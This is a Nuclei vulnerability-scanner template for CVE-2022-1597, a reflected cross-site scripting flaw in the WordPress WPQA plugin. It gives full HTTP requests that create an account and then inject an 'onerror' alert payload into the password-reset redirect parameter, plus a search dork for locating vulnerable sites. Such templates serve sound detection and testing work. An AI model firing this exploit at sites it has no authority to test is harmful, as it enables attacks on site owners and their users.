nuclei-templates/cves/2022/CVE-2022-1597.yaml

64 lines
2.0 KiB
YAML

id: CVE-2022-1597
info:
name: WordPress WPQA <5.4 - Cross-Site Scripting
author: veshraj
severity: medium
description: |
WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.
reference:
- https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
- https://nvd.nist.gov/vuln/detail/CVE-2022-1597
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1597
cwe-id: CWE-79
metadata:
google-query: inurl:/wp-content/plugins/wpqa
verified: "true"
tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa
variables:
user: "{{to_lower(rand_base(5))}}"
pass: "{{user}}{{to_lower(rand_base(3))}}"
redirect_to: '"><img src=x onerror=alert(document.domain)>'
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Content-Type: application/x-www-form-urlencoded
user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Content-Type: application/x-www-form-urlencoded
user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{redirect_to}}'
- '"success":1'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14